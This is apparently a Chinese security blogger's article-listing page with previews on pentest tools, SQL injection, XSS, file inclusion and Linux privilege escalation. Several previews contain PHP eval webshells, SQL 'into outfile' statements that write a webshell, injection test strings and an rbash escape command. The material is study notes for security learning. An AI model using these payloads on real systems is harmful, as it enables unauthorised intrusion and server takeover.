自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(274)
  • 资源 (3)
  • 收藏
  • 关注

原创 pychar使用

切换使用的python版本建议使用下面的使用EXISTING enviromment,会同时加载python和已经安装三方模块;如果使用new environment那pychar只会加载python环境,不会加载python已安装三方模块。设置当前项目要使用的python版本选择要使用的python版本...

2021-09-12 19:42:38 938

原创 python换源

在使用pip安装

2021-09-09 23:05:47 1737

原创 subfinder子域名发现工具的安装

要先安装go环境,然后设置go的代理$ go env -w GOPROXY=https://goproxy.cn,direct安装subfindergo get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder完成后找到subfinder.exe文件一般是在自己设置的gopath的bin下在安装目录下,运行,也可以加入环境变量就可以在任意目录运行...

2021-08-28 16:18:34 1439

原创 使用xray进行被动扫描

下载链接:https://github.com/chaitin/xray/releases选择自己想要安装的版本使用 HTTP 代理发起被动扫描先设置浏览器代理在cmd下执行被动扫描的命令xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output proxy.html可以看到已经开始监听了导入证书在运行之后,在xray所在目录下回生成一个ca.crt证书文件,导入浏览器...

2021-08-25 20:54:34 3743

原创 windows10安装masscan

我的vs是2019版下载地址:https://github.com/robertdavidgraham/masscan项目编译使用vs2019打开vs10文件中的项目添加编译配置在Source Files->misc->string_s.h中添加#if defined(_MSC_VER) && (_MSC_VER == 1929) //这里的_MSC_VER == 根据自己的编译器版本修改/*Visual Studio 2019_16.11*/# inc

2021-08-24 22:18:47 4754 1

原创 cobaltstrike用teamserver连接攻击目标

官网:https://www.cobaltstrike.com/Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。启动服务器端:./teamserver 1

2021-08-22 17:02:07 2503 1

原创 Redis数据库

redis的下载官网下载:https://redis.io/downloadWindows:https://github.com/tporadowski/redis/releasesLinux:http://download.redis.io/releases/在linux上安装redis时,需要进行make,所以在linux上安装redis需要有gcc。一般都会将redis目录放置到 /usr/local/redis目录安装redis时,都是服务的和客户端一起的redis的配置文件是:red

2021-08-10 20:06:36 280

原创 常用的漏洞库

漏洞库Vulhub环境安装部署步骤,漏洞复现流程https://www.wangan.com/docs/vulhubMiddleware-Vulnerability-detectionCVE、CMS、中间件漏洞检测利用合集https://github.com/mai-lang-chai/Middleware-Vulnerability-detection佩奇文库环境搭建,POC,漏洞原理全部集合在一个文库http://wiki.peiqi.tech/白阁文库白阁文库是白泽Sec团队维护

2021-08-10 20:05:40 6639

原创 linux上离线安装python模块

1.下载模块网址https://pypi.org/search,搜索要安装的模块选择你要下载的;下载tar.gz压缩包2.解压可以在linux使用tar命令解压;也可以使用7z解压,使用7z要解压两次3.在python上安装将文件放到linux上,目录随意进入解压后的模块目录使用python命令安装python3 setup.py install这是将模块安装在python3上,如果主机上有多个版本的python,想安装在那个python版本上,就用那个版本python命令...

2021-01-13 11:13:10 2302

原创 sudoers文件详解

sudoers文件是配置管理配置sudo命令的sudoers配置文件详解[root@test ~]# cat /etc/sudoers## Sudoers allows particular users to run various commands as## the root user, without needing the root password.##该文件允许特定用户像root用户一样使用各种各样的命令,而不需要root用户的密码 #### Examples are pro

2020-12-22 15:15:06 2118

原创 python中os.system和os.popen的区别

os.system()和os. popen()都可以执行shell命令,但是他们是有很明显的区别的os.system使用os.system执行shell命令,执行后的结果会自动打印到屏幕上的而且会返回命令的执行状态这里的0表示执行成功即使赋值,也是将返回值就行赋值。而命令的执行结果还是会自动打印到屏幕os.popen使用os.popen执行命令需要使用read()将数据读取出来使用read读出来的数据格式是字符串...

2020-12-08 16:53:58 1557

原创 shell命令返回结果显示格式设置

再shell中如果把某命令的输出结果赋值给一个变量 aa如果使用 echo $a 输出变量,则变量中的 换行都会被忽略掉,所有内容输出到一行而使用 echo “$a” 可正常输出变量中的换行

2020-12-08 11:18:49 783

原创 Shell变量

定义变量时,变量名不加美元符号($,PHP语言中变量需要),如:your_name=“runoob.com”注意,变量名和等号之间不能有空格,这可能和你熟悉的所有编程语言都不一样。同时,变量名的命名须遵循如下规则:命名只能使用英文字母,数字和下划线,首个字符不能以数字开头。中间不能有空格,可以使用下划线(_)。不能使用标点符号。不能使用bash里的关键字(可用help命令查看保留关键字)。使用变量使用一个定义过的变量,只要在变量名前面加美元符号即可,如:your_name=“qi

2020-12-08 10:48:49 127

原创 Shell基础知识

Shell 是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。Shell 既是一种命令语言,又是一种程序设计语言。Shell 脚本(shell script),是一种为 shell 编写的脚本程序。Shell 编程跟 JavaScript、php 编程一样,只要有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以了。Linux 的 Shell 种类众多,常见的有:Bourne Shell(/usr/bin/sh或/bin/sh)Bourne Again Shell(/bi

2020-12-07 16:21:19 157

原创 后信息收集

三个方向具体信息 操作 作用系统信息系统程序:系统版本,安装补丁 net config workstation/server查询简易系统信息 system 查询全部内容 wmic qfe get caption,description,hotfixid,installedon 查询已安装的补丁列表进程服务 tasklist /v 查询正在运行的进程 wmic product get name,version 查询所有安装过的软件及版本 wmic service list brief

2020-10-24 14:58:18 194 1

原创 kali初次启动mysql

service mysql startmysql_secure_installation 初始化密码,回车输入密码,然后一直回车 出现Thanks for using MariaDB!则说明初始化成功mysql -u root -p 此时密码为空use mysql;update user set plugin=""; 设置密码登录开启...

2020-10-24 14:53:30 3328

原创 ms17-010永恒之蓝复现

进入msf,搜索ms17-010模块查看参数设置攻击目标设置攻击模块设置攻击目标设置攻击载荷(用于tcp的的反弹shell)返回shell的IP开始攻击

2019-10-24 23:25:27 360

原创 文件包含-伪协议

文件包含漏洞利用的前提1.web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参数的方式引入;2.用户能够控制包含文件的参数,被包含的文件可被当前页面访问;在使用文件包含漏洞时,必须要能知道其绝对路径方法: 在包含文件处,查看其返回的错误的信息伪协议文件包含file:// 访问本地文件系统http:// 访问 HTTPs 网址ftp:// ...

2019-10-02 16:58:20 8651

原创 各业务功能的测试点

0×1登录功能 20×2找回密码功能 30×3注册功能 40×4支付功能 40×5账户功能 50×6个人中心 50×7 评论功能 60×8 上传功能 70×9 订单功能 70×10 收获地址功能 70×1登录功能1、账号密码能否爆破 即验证码是否有效2、登录权限是否能绕过3、登录账号能否被枚举4、登录账号是否存在弱口令5、验证码是否能被绕过 (...

2019-10-02 16:52:06 1291

原创 XSS小总结

原理开发者在开发时,对客户端过滤严格,导致恶意的javascript代码在浏览器上执行跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的...

2019-10-02 16:41:27 444

原创 SQL注入小总结

原理 在程序开发时,开发人员没有对可以进行数据库交互的地方进行严格过滤。导致用户在提交数据时,可以将构造的恶意sql语句提交到数据库进行执行。个人总结:sql注入就是恶意sql语句在数据库被执行攻击方式(分类、步骤、工具)分类:基于位置点 get post http头部字段(user-agent、cookie、referer、IP) 基于方法 布尔 ...

2019-10-02 16:35:52 293

原创 信息收集总结

域名相关信息域名IP、ns、MX、子域名、旁站、C段 nslookup ip 8.8.8.8 获得其域名IP,可多地ping nslookup -qt=mx xupe.edu.cn dnsenum xupt.ed.cn 获得其ns、MX、并判断是否有与传送漏洞 dnsenum xupt.edu.cn -f host.txt --threads 16 目标 字典 线程 并爆...

2019-10-02 16:27:37 608 1

原创 HTTP状态码的意义

使用ASP.NET/PHP/JSP 或者javascript都会用到http的不同状态,一些常见的状态码为:200 – 服务器成功返回网页 404 – 请求的网页不存在 503 – 服务不可用1xx(临时响应)表示临时响应并需要请求者继续执行操作的状态代码。代码 说明100 (继续) 请求者应当继续提出请求。 服务器返回此代码表示已收到请求的第一部分,正在等待其余部分。101 ...

2019-09-30 23:05:54 179

原创 常见端口漏洞

2019-09-30 23:01:43 348

原创 Iis7.0 cgi解析漏洞复现

漏洞形成原因:漏洞与PHP配置有关,php.ini中的参数cgi.fix_pathinfo参数配置错误导致解析漏洞,开启了cgi.fix_pathinfophp.ini里默认cgi.fix_pathinfo=1,对其进行访问的时候,在URL路径后添加.php后缀名会当做php文件进行解析,漏洞由此产生是在 IIS7.5+php5.3+FastCGI 下的测试情况漏洞条件php.ini里...

2019-09-30 22:23:51 548

原创 常用的php一句话木马格式

测试语句<?php phpinfo();?>最初语句<?php @eval($_POST[cmd]);?><?php @eval($_REQUEST[cmd]);?>前端的传输方式:GET 数据从url提交POST 数据采用隐蔽方式提交REQUEST 即支持GET方式、又支持POST方式后端执行函数:eval()assert()pr...

2019-09-30 22:12:23 17779

原创 常见解析漏洞

IIS6.0-文件解析漏洞IIS6.0-目录解析漏洞IIS7.0-畸形解析漏洞apache-%0a解析漏洞apache-未知后缀名解析漏洞nginx-访问文件解析漏洞nginx-畸形解析漏洞nginx-截断解析漏洞IIS 6.01、目录解析 example:www.xxx.com/xxx.asp/xxx.jpgIIS服务器会把.asp .asa目录下的文件都解析成asp文件。其...

2019-09-30 22:07:01 544

原创 DC1靶机

目标探测因为是在局域网内,所以使用内网扫描目标已经确定,进行端口扫描namp -sT -sC -p- -sV -T 3-sT 全连接-sC 使用默认的安全脚本-p- 全端口-sV 版本探测-T 时间频率(太快的话,可能什么也扫不到)根据扫描结果,我们以80端口位突破口很明显,我们看到网站的cms,所以我们可以直接在网上搜索这个cms的漏洞利用方式使用metaspl...

2019-09-30 21:58:18 1087

原创 为什么大多使用反向shell

反向shell和正向shell的区别正向shell:控制端主动发起连接去连接被控制端。反向shell:被控制端主动连接控制端。在渗透环境中,通常由于被控端因防火墙受限、权限不足、端口被占用等情形。会导致通常进入被控制端的数据包会被拦截等原因的无法连接。而被控制端主动向外发送的数据包通常都不会被拦截。...

2019-09-30 16:14:21 1184 1

原创 mysql写入一句话的方式

一、union select 后写入最常见的写入方式,union select 后跟 into outfile 语句1’ union select 1,2,’<?php @eval($_POST[cmd]);?>’ into outfile “C:\phpStudy\PHPTutorial\WWW\shell.php” --+1’ union select 1,2,’<?p...

2019-09-30 14:55:45 1211

原创 Linux突破受限shell使用sudo提权

使用ssh登录restricted 受限的受限的shell命令,rbash,百度搜索rbash,发现有绕过方法,进行查找,并尝试Vi编辑,输入,到了/bin/bashBASH_CMDS[a]=/bin/sh;a /bin/bash此时就变成了bash的shell然后导入环境变量,目的为了能够使用哪些环境变量中的命令sudo尝试提权尝试提权先转换到 jerry用户,至于为什么...

2019-09-15 17:23:27 1197

原创 wpscan更新失败

wpscan --update 在线更新更新失败那就将包下载到本地更新wget http://blog.dsb.ink/wpscan/wp.zipunzip wp.zip将刚刚wpscan的解压文件 放到apache的目录里设置wpscan的更新配置文件打开本地的服务器service apache2 start更新...

2019-09-15 12:00:54 4383 9

原创 Linux配置不当提权-suid提权

攻击成功,并得到一个shell,但是这里却只是一个简单的shell,首先需要把它转换为一个交互式的shell在简单shell中直接按删除键是不行的,要按住ctrl键之后,再按住删除键才可以,其他键的使用也一样命令python -c 'import pty;pty.spawn("/bin/bash")'现在已经进入了一个交互的shell了,但是可以看到这只是一个普通的用户,所以我们要把他提...

2019-09-14 22:28:47 1616

原创 常用配置文件路径

Windows 系统C:\boot.ini 查看系统版本C:\windows\system32\inetsrv\MetaBase.xml IIS配置文件 C:\windows\repair\sam 存储Windows系统初次安装的密码C:\Program Files\mysql\my.ini mysql配置C:\Program Files\mysql\data\m...

2019-09-13 14:23:11 1397

原创 MYSQL写入一句话的方式

一、union select 后写入最常见的写入方式,union select 后跟 into outfile 语句1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\shell.php" --+1' union select 1,2,'&l...

2019-09-13 14:21:07 1354

原创 SQL布尔盲注常用语句

过程1.判断是否存在注入,注入字符型还是数字型2.猜解当前数据库名 数据库长度→库名3.数据库中的表名 几个表→长度→名称4.表中的字段名 字段个数→长度→名称5.数据判断1’ and ‘1’=‘11’ and ‘1’='22.库名1’ and length(database())>3#1’ and length(database())=5 #1’ and mid...

2019-08-23 16:14:57 2799

原创 SQL注入常用语句

一、判断类型用and判断其字符类型’ and ‘1’='1 正常返回’ and ‘1’='2 页面正常,但是与上个页面相比,没有查询数据(网站没对sql输入做特殊过滤和处理) 字符型上两条必须是一起判断的’ and ‘1’='1 非正常返回,显示错误。可能性 1.有过滤 2.闭合符不对 3.不是字符型总:如果是字符型,那么 ’ and ‘1’=‘1 正常,’ and ‘...

2019-08-23 16:12:42 515

原创 渗透测试---命令执行注入

概述命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内导致原因代码过滤不严格系统漏洞调用第三方组件如:php(system(),shell_exec(),exec(),eval())、 java(struts2)、thinkphp(老牌的php框架)等&、&&、|、||再windows和linux的命令执行中,都有同样的效果&...

2019-08-21 11:41:39 1603

原创 渗透测试---爆破含有token验证

参数选择必须选择pitchfork模式设置字典options设置开始爆破结果爆破成功

2019-08-20 17:27:12 977

原创 渗透测试---提权后获取信息

LINUXuname -a 查看当前系统版本、内核等whoami 查看当前使用的用户pwd 查看当前所在路径ifconfig -a 查看网卡信息,IP、MAC等iptables -L 查看防火墙规则dpkg -l 查看已经安装的软件ps -aux 查看进程netstat -nr 查看网关netstat -ano 查看打开的端口/etc/passwd...

2019-08-20 12:04:18 419

VC9的32位、64位运行库

32位的VC9运行库 64位的VC9运行库 64位系统除了要装64位的运行库也要装32位的运行库

2019-07-11

CentOS6安装honeyd.rar

arpd-0.2.tar.gz glibc-2.14.tar.gz honeyd-1.5c.tar.gz libdnet-1.7.tar.gz libevent-1.4.14b-stable.tar.gz libpcap-1.1.1.tar.gz zlib-1.2.8.tar.gz

2019-06-09

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除